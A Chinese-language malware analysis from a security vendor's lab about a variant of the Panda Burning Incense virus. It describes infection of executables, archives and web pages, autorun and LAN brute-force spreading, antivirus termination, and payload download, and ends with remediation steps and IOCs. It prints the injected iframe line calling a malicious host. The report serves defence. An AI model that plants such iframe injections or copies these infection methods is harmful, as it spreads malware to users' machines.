熊猫烧香感染后现状(高龄病毒熊猫烧香)

一、病毒概述

近日,深信服安全团队收到客户反馈,其内网多台主机中的文件感染了病毒,影响正常业务。经分析,该病毒为“熊猫烧香”病毒变种,虽然该病毒已有十余年历史,但由于其具有很强的感染及传播性,依然很容易在缺少防护的企业内网中传播开来。

病毒会对主机中的可执行文件、压缩文件以及网页文件进行感染,并可通过磁盘、局域网进行传播,同时具有对抗杀软的行为。

最早的“熊猫烧香”病毒中毒后被感染的可执行文件都会变成“熊猫烧香”的图标,这也是该病毒名称的来源。本次捕获的变种由于其在感染可执行文件时会提取原文件的图标并插入到被感染文件中,所以感染后图标不会变。

病毒主要行为如下:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(1)

二、详细分析

2.1 植入部分

病毒运行后首先会将自身复制到%SystemRoot%System32driverssuchost.EXE。

熊猫烧香感染后现状(高龄病毒熊猫烧香)(2)

运行suchost.exe然后退出。

熊猫烧香感染后现状(高龄病毒熊猫烧香)(3)

2.2 传播部分

2.2.1 磁盘传播

suchost.exe将自身复制到每个磁盘根目录下,命名为“.exe”,同时在每个根目录下创建一个“autorun.inf”文件,文件属性为“只读”、“隐藏”、“系统”:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(4)

熊猫烧香感染后现状(高龄病毒熊猫烧香)(5)

autorun.inf文件内容如下,功能为打开磁盘后自动运行病毒体“.exe”,通过这种方式病毒可以通过U盘或者网络磁盘传播。微软在2011年发布的补丁包KB967940中对自动运行功能进行了限定,只支持CD/DVD媒体,所以打了补丁包或者win7以后的系统不会通过这种方式感染:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(6)

运行磁盘根目录下的“.exe”,会打开磁盘对应的目录,并关闭“我的电脑”窗口,后面的执行流程不变。

熊猫烧香感染后现状(高龄病毒熊猫烧香)(7)

2.2.2 文件感染

排除感染系统目录,包括:

WINDOWS、WINNT、system32、Documentsand Settings、System Volume Information、Recycled、Windows NT、WindowsUpdate、WindowsMedia Player、Outlook Express、Internet Explorer、NetMeeting、Common Files、ComPlus Applications、Messenger、InstallShield Installation Information、MSN、MicrosoftFrontpage、Movie Maker、MSN Gamin Zone

每感染一个文件夹,都会在其目录下创建一个Desktop_.ini记录感染日期。病毒在下次感染前会将当前的日期与记录的日期进行比较,如果相同则不再重复感染。

熊猫烧香感染后现状(高龄病毒熊猫烧香)(8)

病毒程序运行时,会判断其所在目录是否存在Desktop_.ini文件,如果存在的话就将其删除:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(9)

排除感染NTDETECT.COM文件,然后通过文件后缀名确认感染目标,感染的文件类型主要分为三类:压缩文件、可执行文件和网页文件:RAR、ZIP、EXE、SCR、PIF、COM、htm、html、asp、php、jsp、aspx:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(10)

在感染文件前先获取文件大小,超过某个值就不感染。压缩文件为20M,可执行文件与网页文件为10M:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(11)

对于RAR、ZIP后缀的压缩文件,会执行winrar命令将其解压缩到C:MyRARwork文件夹,感染其中的文件后再压缩回原目录:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(12)

对于EXE、SCR、PIF、COM后缀的可执行文件,首先判断其是否包含字符串“BMW!!”,是的话则不执行感染:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(13)

提取原文件的图标,将其临时保存到%Temp%目录:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(14)

复制病毒文件覆盖被感染文件:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(15)

将图标文件除写入病毒文件,使得被感染的文件图标不变,随后删除图标文件:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(16)

随后将被感染的原文件添加到病毒文件后面,并在尾部写入标志:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(17)

可执行文件被感染后的结构为:病毒文件(替换了图标) 原文件 0×00 ”BMW!!” 原文件名 ”.exe” 0×02 原文件大小 0×01:

被感染的可执行文件尾部如下:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(18)

运行被感染的文件,会将原文件释放出来,命名为“原文件名 .exe”:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(19)

在Temp目录下创建bat脚本并运行, 在Temp目录下创建bat脚本并运行,bat脚本用于删除被感染的文件并将释放的“原文件名 .exe”重命名为原文件名,内容如下:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(20)

对于htm、html、asp、php、jsp、aspx后缀的网页文件的感染,是将恶意链接”<iframe src=”hxxp://www.9z9t.com/htmmm/mm.htm” width=0height=0></iframe>””解密后插入到文件末尾。

熊猫烧香感染后现状(高龄病毒熊猫烧香)(21)

2.2.3 局域网传播

对139、445端口进行暴破传播:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(22)

2.3 恶意行为部分

停止或卸载杀毒软件:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(23)

访问如下网页获取恶意程序下载链接,下载恶意程序并运行:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(24)

添加开机自启动项并禁止显示隐藏文件:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(25)

关闭网络共享:

熊猫烧香感染后现状(高龄病毒熊猫烧香)(26)

将默认浏览器设置为IE,然后将本机mac作为参数访问链接”hxxp://www.daohang08.com/down/tj/mac.asp?mac=”,用于统计中毒主机信息。

熊猫烧香感染后现状(高龄病毒熊猫烧香)(27)

三、解决方案

病毒检测查杀

1、深信服为广大用户免费提供查杀工具,可下载如下工具,进行检测查杀。

64位系统下载链接:http://edr.sangfor.com.cn/tool/SfabAntiBot_X64.7z

32位系统下载链接:http://edr.sangfor.com.cn/tool/SfabAntiBot_X86.7z

病毒防御

1、及时给电脑打补丁,修复漏洞。

2、对重要的数据文件定期进行非本地备份。

3、不要点击来源不明的邮件附件,不从不明网站下载软件。

4、尽量关闭不必要的文件共享权限。

5、更改账户密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃。

6、如果业务上无需使用RDP的,建议关闭RDP。

最后,建议企业对全网进行一次安全检查和杀毒扫描,加强防护工作。

四、IOC

MD5:

AE8E8289B688497A672FE90D8A0AAE3F

URL:

hxxp://www.9z9t.com/htmmm/mm.htm hxxp://www.9z9t.com/down1.txt hxxp://www.daohang08.com/down/houmendown.txt hxxp://www.daohang08.com/down/tj/mac.asp?mac=

*本文作者:千里目安全实验室,转载自FreeBuf.COM

,

免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。